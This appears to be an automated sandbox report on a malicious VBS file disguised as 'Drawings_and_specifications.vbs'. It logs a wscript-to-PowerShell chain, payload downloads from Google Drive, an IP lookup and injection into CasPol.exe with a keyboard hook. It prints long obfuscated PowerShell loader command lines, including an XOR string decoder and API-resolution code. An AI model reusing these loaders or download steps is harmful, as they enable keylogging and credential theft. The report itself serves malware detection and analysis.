00000007.00000002.2180770146.0000018B003F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2180770146.0000018B00674000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2180770146.0000018B005B0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2180770146.0000018B004DE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2180770146.0000018B003A8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2180770146.0000018B00359000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2180770146.0000018B004AF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2180770146.0000018B005D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2180770146.0000018B00392000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2180770146.0000018B0040F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2180770146.0000018B00300000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2180770146.0000018B0034F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2180770146.0000018B00469000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2180770146.0000018B002A7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1ImsPjLy7QqLaprcBEvqIu0wU4k4KAVmk
Source: unknownDNS traffic detected: queries for: drive.google.com
Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1ImsPjLy7QqLaprcBEvqIu0wU4k4KAVmk HTTP/1.1Host: drive.google.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1vJVQs63DZwsuwssxWJ8F3J7tzecR7IBa HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/28h7hnips76btsibg57lgmgj73ftidkn/1678713000000/13880735354025239062/*/1vJVQs63DZwsuwssxWJ8F3J7tzecR7IBa?e=download&uuid=92dd0e3d-baea-43aa-a822-2534961c9412 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-10-6g-docs.googleusercontent.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: unknownHTTPS traffic detected: 142.250.184.206:443 -> 192.168.11.20:49798 version: TLS 1.2
Source: unknownHTTPS traffic detected: 142.250.184.206:443 -> 192.168.11.20:49807 version: TLS 1.2
Source: unknownHTTPS traffic detected: 142.250.186.65:443 -> 192.168.11.20:49808 version: TLS 1.2
Source: unknownHTTPS traffic detected: 64.185.227.155:443 -> 192.168.11.20:49809 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

barindex
Installs a global keyboard hook
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWindows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exeJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior

System Summary

barindex
Wscript starts Powershell (via cmd or directly)
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe cmd /k echo hell
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Boykott = """GeFAlu CnUbcLut Si GoAnn C TeK Do EnThsRat M0 r2Ef S{Sa Se Ch i Pap SaSarUnaVem S(Sk[JoS AtPar SivinEkg o]ab`$SePReaStaFotKrrKryUpkAmnSpiFonIm2 K0Th1 A)fl;Fi M`$ aFhao GnRee BtByiFlk S1Tr3Sa4Sc Se=Ka C'bo'Kr; T BoW Tr RiAstOve b-MoHBaoBrs dt C N`$raFGloSon Te St Si FkLe1Ea3 P4 N;Do LyW SrKai Ft ReKn-InHGro TssttKr Ou`$LaF IoBenExeCyt Ci Nkur1En3Ec4Ra; S DiWSrrAnirat me P-AdHTeo OsYat J K`$LdFFloOpn Fe Ct ZiNikCh1Sv3Te4st; D A Ha M is`$AaBHad ze BlEn2Un2Su2 E Po=Pa FiNDreRiw c-BuOEnbVrj Ie BcSct U EtbTeypat PeRe[en]di Sq( a`$foPUnaSwa Ot Vr UyTik Nn Hi DnNu2 T0Ou1Ol.RaL Ee unOvghat Rh D A/Vi af2 S)Ta;co La In K uFShoAfr A( C`$SiSStpTraIngUd=To0Ad; K I`$UlS Pp UaTrgJa W- SlUnt B Th`$ UPSua TaIct BrUpyAak SnstiStnCr2 N0No1Ro.SeLsceBrnBeg RtUnhRe;al T`$ cS UpTiapagSe+Br=To2Ol) D{ko T Ca Lo qu L Ma S S`$ TB AdGlesklfl2Dr2Br2 C[ C`$FoSPupfoaargHo/ O2 B] v Ra=Me R[ EczuoPunThvUde ErAltFo]Sj:St: BT PoKoB Hy Mt Fe S(Su`$NoPKiaFiaRotInr RySnkDrnPri SnFo2Sk0 K1 S.SySBeuPab Bs HtUpr Ii UnAkgAd(De`$BrSSup UaRigIn,Ra T2El) o, C Tr1 I6 L) N;Pa S Ho`$ FBMadEneStlAp2 p2 a2Co[Ve`$RtS Hp Ua GgBo/ S2Gi]Sp Dr=bl M(po`$UdBdad We Cl q2 N2Ec2Sk[Du`$ SS Tp da Eg S/Hj2 H] S B- Sb Bx FoNorUn T1Ci5De5An)Ek;He Ma G Ba Op}du B[ToSHotPerBli TnPogRe]Do[ExS Sy bs St ReEumCo. PT VeTaxTotSa. CESlnCicBooKedAni SnStg S] F: I: SA PSsmCFrISaISt. TG CeantCeSEltAdrMiiMun KgUn(Ch`$ tBOmddie Ol G2 A2Tr2 E) E;ch}sc`$seD SeSkmHeoPog C0Ar=GuK WoTvnThs Ht M0Fo2 S Mo'GrC F8PoEEu2 OERa8SoE OFWbFQuEFrFSh6 CBHa5 MF mF JFWe7TuF H7Mi'ud; H`$ AD KeRamInoXeg S1Re=ShKDioMonFhs Mt M0 K2 M Ju' SDTa6 RFAf2AlF C8MeEHa9 RFCo4 IEBl8 SF U4 AF SDpeEEpF SBLd5 LC FCFoFDe2HoFEl5TaAKl8EmAHi9paBGi5StC TE FFHy5 RE b8ArFUdA SFMuDRdFsuE LD R5smF hA CEDkF FFFl2 PE BDInFNoEFeDPi6 UFCeEIdE SFKoF O3EsF a4SqFWaFBlE P8le'Ro;be`$AfDHleScmDeoMog M2 c=SoKIno NnBrs BtSi0af2Om Op' VDRaCPrFElE HE OFCaCSeB JE A9KrF I4MaFFo8 LDSlA KFWaFPiF mFSyESt9NoFKoECoEVa8 VEEw8 V'Di;Ra`$ PD UeGumAko Sg L3 I= SK ao en Rs KtRi0La2Un K' SCBo8 CEFe2EmEGu8FiEShFBuFRaE PF M6 SBTu5 HCSl9AaETjE AFPo5 GECyFinF C2MiF o6FrF MEaiB D5GrD T2 QF N5 CEHyF BFSaE BEOv9 CFDi4HjECiBbrCSe8 BF ME VEFe9ciERiD FF S2PaF D8 SFKaESlE D8laB s5SvD S3 OFKoASuFIn5StFViFJaFRe7ReFSpESyCSk9 BF JE TF eDSo'Pa;Ov`$HyDPeeMomChoIngKo4So= pKFuoPan Fs PtLa0Pr2Af Ja'BuE o8 RE SFFlECh9ChFBr2TaF P5LaFNyC P'In;Sy`$PhD seBemPhoPag r5Kr= oKPooRen Ts Stbi0Ul2Po D' RD GC TFSyESkEAuFCoDra6 TF P4 PFStFHyE WE JFKr7 AF OEFlD a3NoFReA FFOr5 IF FF SF b7 NF HEYe'br;So`$PeDAmeImmKuoRagFo6In= iKSpoBnnDes Dt U0Co2Ti Fo'MaC S9 CC SF SCus8elE UB UFGeE SFRu8JeFSp2UnFMeA IFBo7MaDKa5 aFFlAUnFSe6FoF oE ABRh7viBNoB RDVu3BjF B2 RFBiFThFZaEMuDSi9 FEUd2 CCTu8HeFTi2 FF BC LB T7DrBSeBPiC wBWeESuEekFHa9 EFCo7NoFSp2MeFJo8Ce' S; M`$ SDAqeOrm PoBagSe7Af= CKPro DnResKat K0go2Re Un' TCRu9 PEOpEBaF C5 AE AF SF A2LaF D6StFAnEKoBBe7doB PBGlDSl6 IF PA WFRe5 UF fAAw
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe cmd /k echo hellJump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Boykott = """GeFAlu CnUbcLut Si GoAnn C TeK Do EnThsRat M0 r2Ef S{Sa Se Ch i Pap SaSarUnaVem S(Sk[JoS AtPar SivinEkg o]ab`$SePReaStaFotKrrKryUpkAmnSpiFonIm2 K0Th1 A)fl;Fi M`$ aFhao GnRee BtByiFlk S1Tr3Sa4Sc Se=Ka C'bo'Kr; T BoW Tr RiAstOve b-MoHBaoBrs dt C N`$raFGloSon Te St Si FkLe1Ea3 P4 N;Do LyW SrKai Ft ReKn-InHGro TssttKr Ou`$LaF IoBenExeCyt Ci Nkur1En3Ec4Ra; S DiWSrrAnirat me P-AdHTeo OsYat J K`$LdFFloOpn Fe Ct ZiNikCh1Sv3Te4st; D A Ha M is`$AaBHad ze BlEn2Un2Su2 E Po=Pa FiNDreRiw c-BuOEnbVrj Ie BcSct U EtbTeypat PeRe[en]di Sq( a`$foPUnaSwa Ot Vr UyTik Nn Hi DnNu2 T0Ou1Ol.RaL Ee unOvghat Rh D A/Vi af2 S)Ta;co La In K uFShoAfr A( C`$SiSStpTraIngUd=To0Ad; K I`$UlS Pp UaTrgJa W- SlUnt B Th`$ UPSua TaIct BrUpyAak SnstiStnCr2 N0No1Ro.SeLsceBrnBeg RtUnhRe;al T`$ cS UpTiapagSe+Br=To2Ol) D{ko T Ca Lo qu L Ma S S`$ TB AdGlesklfl2Dr2Br2 C[ C`$FoSPupfoaargHo/ O2 B] v Ra=Me R[ EczuoPunThvUde ErAltFo]Sj:St: BT PoKoB Hy Mt Fe S(Su`$NoPKiaFiaRotInr RySnkDrnPri SnFo2Sk0 K1 S.SySBeuPab Bs HtUpr Ii UnAkgAd(De`$BrSSup UaRigIn,Ra T2El) o, C Tr1 I6 L) N;Pa S Ho`$ FBMadEneStlAp2 p2 a2Co[Ve`$RtS Hp Ua GgBo/ S2Gi]Sp Dr=bl M(po`$UdBdad We Cl q2 N2Ec2Sk[Du`$ SS Tp da Eg S/Hj2 H] S B- Sb Bx FoNorUn T1Ci5De5An)Ek;He Ma G Ba Op}du B[ToSHotPerBli TnPogRe]Do[ExS Sy bs St ReEumCo. PT VeTaxTotSa. CESlnCicBooKedAni SnStg S] F: I: SA PSsmCFrISaISt. TG CeantCeSEltAdrMiiMun KgUn(Ch`$ tBOmddie Ol G2 A2Tr2 E) E;ch}sc`$seD SeSkmHeoPog C0Ar=GuK WoTvnThs Ht M0Fo2 S Mo'GrC F8PoEEu2 OERa8SoE OFWbFQuEFrFSh6 CBHa5 MF mF JFWe7TuF H7Mi'ud; H`$ AD KeRamInoXeg S1Re=ShKDioMonFhs Mt M0 K2 M Ju' SDTa6 RFAf2AlF C8MeEHa9 RFCo4 IEBl8 SF U4 AF SDpeEEpF SBLd5 LC FCFoFDe2HoFEl5TaAKl8EmAHi9paBGi5StC TE FFHy5 RE b8ArFUdA SFMuDRdFsuE LD R5smF hA CEDkF FFFl2 PE BDInFNoEFeDPi6 UFCeEIdE SFKoF O3EsF a4SqFWaFBlE P8le'Ro;be`$AfDHleScmDeoMog M2 c=SoKIno NnBrs BtSi0af2Om Op' VDRaCPrFElE HE OFCaCSeB JE A9KrF I4MaFFo8 LDSlA KFWaFPiF mFSyESt9NoFKoECoEVa8 VEEw8 V'Di;Ra`$ PD UeGumAko Sg L3 I= SK ao en Rs KtRi0La2Un K' SCBo8 CEFe2EmEGu8FiEShFBuFRaE PF M6 SBTu5 HCSl9AaETjE AFPo5 GECyFinF C2MiF o6FrF MEaiB D5GrD T2 QF N5 CEHyF BFSaE BEOv9 CFDi4HjECiBbrCSe8 BF ME VEFe9ciERiD FF S2PaF D8 SFKaESlE D8laB s5SvD S3 OFKoASuFIn5StFViFJaFRe7ReFSpESyCSk9 BF JE TF eDSo'Pa;Ov`$HyDPeeMomChoIngKo4So= pKFuoPan Fs PtLa0Pr2Af Ja'BuE o8 RE SFFlECh9ChFBr2TaF P5LaFNyC P'In;Sy`$PhD seBemPhoPag r5Kr= oKPooRen Ts Stbi0Ul2Po D' RD GC TFSyESkEAuFCoDra6 TF P4 PFStFHyE WE JFKr7 AF OEFlD a3NoFReA FFOr5 IF FF SF b7 NF HEYe'br;So`$PeDAmeImmKuoRagFo6In= iKSpoBnnDes Dt U0Co2Ti Fo'MaC S9 CC SF SCus8elE UB UFGeE SFRu8JeFSp2UnFMeA IFBo7MaDKa5 aFFlAUnFSe6FoF oE ABRh7viBNoB RDVu3BjF B2 RFBiFThFZaEMuDSi9 FEUd2 CCTu8HeFTi2 FF BC LB T7DrBSeBPiC wBWeESuEekFHa9 EFCo7NoFSp2MeFJo8Ce' S; M`$ SDAqeOrm PoBagSe7Af= CKPro DnResKat K0go2Re Un' TCRu9 PEOpEBaF C5 AE AF SF A2LaF D6StFAnEKoBBe7doB PBGlDSl6 IF PA WFRe5 UF fAAwJump to behavior
Potential malicious VBS script found (suspicious strings)
Source: Initial file: Thingumm218.ShellExecute Endosper ,chrw(34) & W9 & chrw(34), "", "", i
Very long command line found
Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 20870
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 6839
Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 20870Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 6839Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFD2BDD1A137_2_00007FFD2BDD1A13
Source: Drawings_and_specifications.vbsInitial sample: Strings found which are bigger than 50
Source: C:\Windows\System32\wscript.exeSection loaded: edgegdi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: edgegdi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Drawings_and_specifications.vbs"
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\ipconfig.exe ipconfig /flushdns
Source: C:\Windows\System32\ipconfig.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe cmd /k echo hell
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Boykott = """GeFAlu CnUbcLut Si GoAnn C TeK Do EnThsRat M0 r2Ef S{Sa Se Ch i Pap SaSarUnaVem S(Sk[JoS AtPar SivinEkg o]ab`$SePReaStaFotKrrKryUpkAmnSpiFonIm2 K0Th1 A)fl;Fi M`$ aFhao GnRee BtByiFlk S1Tr3Sa4Sc Se=Ka C'bo'Kr; T BoW Tr RiAstOve b-MoHBaoBrs dt C N`$raFGloSon Te St Si FkLe1Ea3 P4 N;Do LyW SrKai Ft ReKn-InHGro TssttKr Ou`$LaF IoBenExeCyt Ci Nkur1En3Ec4Ra; S DiWSrrAnirat me P-AdHTeo OsYat J K`$LdFFloOpn Fe Ct ZiNikCh1Sv3Te4st; D A Ha M is`$AaBHad ze BlEn2Un2Su2 E Po=Pa FiNDreRiw c-BuOEnbVrj Ie BcSct U EtbTeypat PeRe[en]di Sq( a`$foPUnaSwa Ot Vr UyTik Nn Hi DnNu2 T0Ou1Ol.RaL Ee unOvghat Rh D A/Vi af2 S)Ta;co La In K uFShoAfr A( C`$SiSStpTraIngUd=To0Ad; K I`$UlS Pp UaTrgJa W- SlUnt B Th`$ UPSua TaIct BrUpyAak SnstiStnCr2 N0No1Ro.SeLsceBrnBeg RtUnhRe;al T`$ cS UpTiapagSe+Br=To2Ol) D{ko T Ca Lo qu L Ma S S`$ TB AdGlesklfl2Dr2Br2 C[ C`$FoSPupfoaargHo/ O2 B] v Ra=Me R[ EczuoPunThvUde ErAltFo]Sj:St: BT PoKoB Hy Mt Fe S(Su`$NoPKiaFiaRotInr RySnkDrnPri SnFo2Sk0 K1 S.SySBeuPab Bs HtUpr Ii UnAkgAd(De`$BrSSup UaRigIn,Ra T2El) o, C Tr1 I6 L) N;Pa S Ho`$ FBMadEneStlAp2 p2 a2Co[Ve`$RtS Hp Ua GgBo/ S2Gi]Sp Dr=bl M(po`$UdBdad We Cl q2 N2Ec2Sk[Du`$ SS Tp da Eg S/Hj2 H] S B- Sb Bx FoNorUn T1Ci5De5An)Ek;He Ma G Ba Op}du B[ToSHotPerBli TnPogRe]Do[ExS Sy bs St ReEumCo. PT VeTaxTotSa. CESlnCicBooKedAni SnStg S] F: I: SA PSsmCFrISaISt. TG CeantCeSEltAdrMiiMun KgUn(Ch`$ tBOmddie Ol G2 A2Tr2 E) E;ch}sc`$seD SeSkmHeoPog C0Ar=GuK WoTvnThs Ht M0Fo2 S Mo'GrC F8PoEEu2 OERa8SoE OFWbFQuEFrFSh6 CBHa5 MF mF JFWe7TuF H7Mi'ud; H`$ AD KeRamInoXeg S1Re=ShKDioMonFhs Mt M0 K2 M Ju' SDTa6 RFAf2AlF C8MeEHa9 RFCo4 IEBl8 SF U4 AF SDpeEEpF SBLd5 LC FCFoFDe2HoFEl5TaAKl8EmAHi9paBGi5StC TE FFHy5 RE b8ArFUdA SFMuDRdFsuE LD R5smF hA CEDkF FFFl2 PE BDInFNoEFeDPi6 UFCeEIdE SFKoF O3EsF a4SqFWaFBlE P8le'Ro;be`$AfDHleScmDeoMog M2 c=SoKIno NnBrs BtSi0af2Om Op' VDRaCPrFElE HE OFCaCSeB JE A9KrF I4MaFFo8 LDSlA KFWaFPiF mFSyESt9NoFKoECoEVa8 VEEw8 V'Di;Ra`$ PD UeGumAko Sg L3 I= SK ao en Rs KtRi0La2Un K' SCBo8 CEFe2EmEGu8FiEShFBuFRaE PF M6 SBTu5 HCSl9AaETjE AFPo5 GECyFinF C2MiF o6FrF MEaiB D5GrD T2 QF N5 CEHyF BFSaE BEOv9 CFDi4HjECiBbrCSe8 BF ME VEFe9ciERiD FF S2PaF D8 SFKaESlE D8laB s5SvD S3 OFKoASuFIn5StFViFJaFRe7ReFSpESyCSk9 BF JE TF eDSo'Pa;Ov`$HyDPeeMomChoIngKo4So= pKFuoPan Fs PtLa0Pr2Af Ja'BuE o8 RE SFFlECh9ChFBr2TaF P5LaFNyC P'In;Sy`$PhD seBemPhoPag r5Kr= oKPooRen Ts Stbi0Ul2Po D' RD GC TFSyESkEAuFCoDra6 TF P4 PFStFHyE WE JFKr7 AF OEFlD a3NoFReA FFOr5 IF FF SF b7 NF HEYe'br;So`$PeDAmeImmKuoRagFo6In= iKSpoBnnDes Dt U0Co2Ti Fo'MaC S9 CC SF SCus8elE UB UFGeE SFRu8JeFSp2UnFMeA IFBo7MaDKa5 aFFlAUnFSe6FoF oE ABRh7viBNoB RDVu3BjF B2 RFBiFThFZaEMuDSi9 FEUd2 CCTu8HeFTi2 FF BC LB T7DrBSeBPiC wBWeESuEekFHa9 EFCo7NoFSp2MeFJo8Ce' S; M`$ SDAqeOrm PoBagSe7Af= CKPro DnResKat K0go2Re Un' TCRu9 PEOpEBaF C5 AE AF SF A2LaF D6StFAnEKoBBe7doB PBGlDSl6 IF PA WFRe5 UF fAAw
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "Function Konst02 { param([String]$Paatryknin201); $Fonetik134 = ''; Write-Host $Fonetik134; Write-Host $Fonetik134; Write-Host $Fonetik134; $Bdel222 = New-Object byte[] ($Paatryknin201.Length / 2); For($Spag=0; $Spag -lt $Paatryknin201.Length; $Spag+=2){ $Bdel222[$Spag/2] = [convert]::ToByte($Paatryknin201.Substring($Spag, 2), 16); $Bdel222[$Spag/2] = ($Bdel222[$Spag/2] -bxor 155); } [String][System.Text.Encoding]::ASCII.GetString($Bdel222);}$Demog0=Konst02 'C8E2E8EFFEF6B5FFF7F7';$Demog1=Konst02 'D6F2F8E9F4E8F4FDEFB5CCF2F5A8A9B5CEF5E8FAFDFED5FAEFF2EDFED6FEEFF3F4FFE8';$Demog2=Konst02 'DCFEEFCBE9F4F8DAFFFFE9FEE8E8';$Demog3=Konst02 'C8E2E8EFFEF6B5C9EEF5EFF2F6FEB5D2F5EFFEE9F4EBC8FEE9EDF2F8FEE8B5D3FAF5FFF7FEC9FEFD';$Demog4=Konst02 'E8EFE9F2F5FC';$Demog5=Konst02 'DCFEEFD6F4FFEEF7FED3FAF5FFF7FE';$Demog6=Konst02 'C9CFC8EBFEF8F2FAF7D5FAF6FEB7BBD3F2FFFED9E2C8F2FCB7BBCBEEF9F7F2F8';$Demog7=Konst02 'C9EEF5EFF2F6FEB7BBD6FAF5FAFCFEFF';$Demog8=Konst02 'C9FEFDF7FEF8EFFEFFDFFEF7FEFCFAEFFE';$Demog9=Konst02 'D2F5D6FEF6F4E9E2D6F4FFEEF7FE';$Elevatorfo0=Konst02 'D6E2DFFEF7FEFCFAEFFECFE2EBFE';$Elevatorfo1=Konst02 'D8F7FAE8E8B7BBCBEEF9F7F2F8B7BBC8FEFAF7FEFFB7BBDAF5E8F2D8F7FAE8E8B7BBDAEEEFF4D8F7FAE8E8';$Elevatorfo2=Konst02 'D2F5EDF4F0FE';$Elevatorfo3=Konst02 'CBEEF9F7F2F8B7BBD3F2FFFED9E2C8F2FCB7BBD5FEECC8F7F4EFB7BBCDF2E9EFEEFAF7';$Elevatorfo4=Konst02 'CDF2E9EFEEFAF7DAF7F7F4F8';$Elevatorfo5=Konst02 'F5EFFFF7F7';$Elevatorfo6=Konst02 'D5EFCBE9F4EFFEF8EFCDF2E9EFEEFAF7D6FEF6F4E9E2';$Elevatorfo7=Konst02 'D2DEC3';$Elevatorfo8=Konst02 'C7';$Vattppe=Konst02 'CEC8DEC9A8A9';$Deviledj=Konst02 'D8FAF7F7CCF2F5FFF4ECCBE9F4F8DA';function fkp {Param ($Kominternf, $Back) ;$Faggrupp0 =Konst02 'BFCDFAE9F6F9BBA6BBB3C0DAEBEBDFF4F6FAF2F5C6A1A1D8EEE9E9FEF5EFDFF4F6FAF2F5B5DCFEEFDAE8E8FEF6F9F7F2FEE8B3B2BBE7BBCCF3FEE9FEB6D4F9F1FEF8EFBBE0BBBFC4B5DCF7F4F9FAF7DAE8E8FEF6F9F7E2D8FAF8F3FEBBB6DAF5FFBBBFC4B5D7F4F8FAEFF2F4F5B5C8EBF7F2EFB3BFDEF7FEEDFAEFF4E9FDF4A3B2C0B6AAC6B5DEEAEEFAF7E8B3BFDFFEF6F4FCABB2BBE6B2B5DCFEEFCFE2EBFEB3BFDFFEF6F4FCAAB2';&($Elevatorfo7) $Faggrupp0;$Faggrupp5 = Konst02 'BFDDF7FAFCFCFEF7BBA6BBBFCDFAE9F6F9B5DCFEEFD6FEEFF3F4FFB3BFDFFEF6F4FCA9B7BBC0CFE2EBFEC0C6C6BBDBB3BFDFFEF6F4FCA8B7BBBFDFFEF6F4FCAFB2B2';&($Elevatorfo7) $Faggrupp5;$Faggrupp1 = Konst02 'E9FEEFEEE9F5BBBFDDF7FAFCFCFEF7B5D2F5EDF4F0FEB3BFF5EEF7F7B7BBDBB3C0C8E2E8EFFEF6B5C9EEF5EFF2F6FEB5D2F5EFFEE9F4EBC8FEE9EDF2F8FEE8B5D3FAF5FFF7FEC9FEFDC6B3D5FEECB6D4F9F1FEF8EFBBC8E2E8EFFEF6B5C9EEF5EFF2F6FEB5D2F5EFFEE9F4EBC8FEE9EDF2F8FEE8B5D3FAF5FFF7FEC9FEFDB3B3D5FEECB6D4F9F1FEF8EFBBD2F5EFCBEFE9B2B7BBB3BFCDFAE9F6F9B5DCFEEFD6FEEFF3F4FFB3BFDFFEF6F4FCAEB2B2B5D2F5EDF4F0FEB3BFF5EEF7F7B7BBDBB3BFD0F4F6F2F5EFFEE9F5FDB2B2B2B2B7BBBFD9FAF8F0B2B2';&($Elevatorfo7) $Faggrupp1;}function GDT {Param ([Parameter(Position = 0, Mandatory = $True)] [Type[]] $Medicof,[Parameter(Position = 1)] [Type] $Medplanbli = [Void]);$Faggru
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\ipconfig.exe ipconfig /flushdnsJump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe cmd /k echo hellJump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Boykott = """GeFAlu CnUbcLut Si GoAnn C TeK Do EnThsRat M0 r2Ef S{Sa Se Ch i Pap SaSarUnaVem S(Sk[JoS AtPar SivinEkg o]ab`$SePReaStaFotKrrKryUpkAmnSpiFonIm2 K0Th1 A)fl;Fi M`$ aFhao GnRee BtByiFlk S1Tr3Sa4Sc Se=Ka C'bo'Kr; T BoW Tr RiAstOve b-MoHBaoBrs dt C N`$raFGloSon Te St Si FkLe1Ea3 P4 N;Do LyW SrKai Ft ReKn-InHGro TssttKr Ou`$LaF IoBenExeCyt Ci Nkur1En3Ec4Ra; S DiWSrrAnirat me P-AdHTeo OsYat J K`$LdFFloOpn Fe Ct ZiNikCh1Sv3Te4st; D A Ha M is`$AaBHad ze BlEn2Un2Su2 E Po=Pa FiNDreRiw c-BuOEnbVrj Ie BcSct U EtbTeypat PeRe[en]di Sq( a`$foPUnaSwa Ot Vr UyTik Nn Hi DnNu2 T0Ou1Ol.RaL Ee unOvghat Rh D A/Vi af2 S)Ta;co La In K uFShoAfr A( C`$SiSStpTraIngUd=To0Ad; K I`$UlS Pp UaTrgJa W- SlUnt B Th`$ UPSua TaIct BrUpyAak SnstiStnCr2 N0No1Ro.SeLsceBrnBeg RtUnhRe;al T`$ cS UpTiapagSe+Br=To2Ol) D{ko T Ca Lo qu L Ma S S`$ TB AdGlesklfl2Dr2Br2 C[ C`$FoSPupfoaargHo/ O2 B] v Ra=Me R[ EczuoPunThvUde ErAltFo]Sj:St: BT PoKoB Hy Mt Fe S(Su`$NoPKiaFiaRotInr RySnkDrnPri SnFo2Sk0 K1 S.SySBeuPab Bs HtUpr Ii UnAkgAd(De`$BrSSup UaRigIn,Ra T2El) o, C Tr1 I6 L) N;Pa S Ho`$ FBMadEneStlAp2 p2 a2Co[Ve`$RtS Hp Ua GgBo/ S2Gi]Sp Dr=bl M(po`$UdBdad We Cl q2 N2Ec2Sk[Du`$ SS Tp da Eg S/Hj2 H] S B- Sb Bx FoNorUn T1Ci5De5An)Ek;He Ma G Ba Op}du B[ToSHotPerBli TnPogRe]Do[ExS Sy bs St ReEumCo. PT VeTaxTotSa. CESlnCicBooKedAni SnStg S] F: I: SA PSsmCFrISaISt. TG CeantCeSEltAdrMiiMun KgUn(Ch`$ tBOmddie Ol G2 A2Tr2 E) E;ch}sc`$seD SeSkmHeoPog C0Ar=GuK WoTvnThs Ht M0Fo2 S Mo'GrC F8PoEEu2 OERa8SoE OFWbFQuEFrFSh6 CBHa5 MF mF JFWe7TuF H7Mi'ud; H`$ AD KeRamInoXeg S1Re=ShKDioMonFhs Mt M0 K2 M Ju' SDTa6 RFAf2AlF C8MeEHa9 RFCo4 IEBl8 SF U4 AF SDpeEEpF SBLd5 LC FCFoFDe2HoFEl5TaAKl8EmAHi9paBGi5StC TE FFHy5 RE b8ArFUdA SFMuDRdFsuE LD R5smF hA CEDkF FFFl2 PE BDInFNoEFeDPi6 UFCeEIdE SFKoF O3EsF a4SqFWaFBlE P8le'Ro;be`$AfDHleScmDeoMog M2 c=SoKIno NnBrs BtSi0af2Om Op' VDRaCPrFElE HE OFCaCSeB JE A9KrF I4MaFFo8 LDSlA KFWaFPiF mFSyESt9NoFKoECoEVa8 VEEw8 V'Di;Ra`$ PD UeGumAko Sg L3 I= SK ao en Rs KtRi0La2Un K' SCBo8 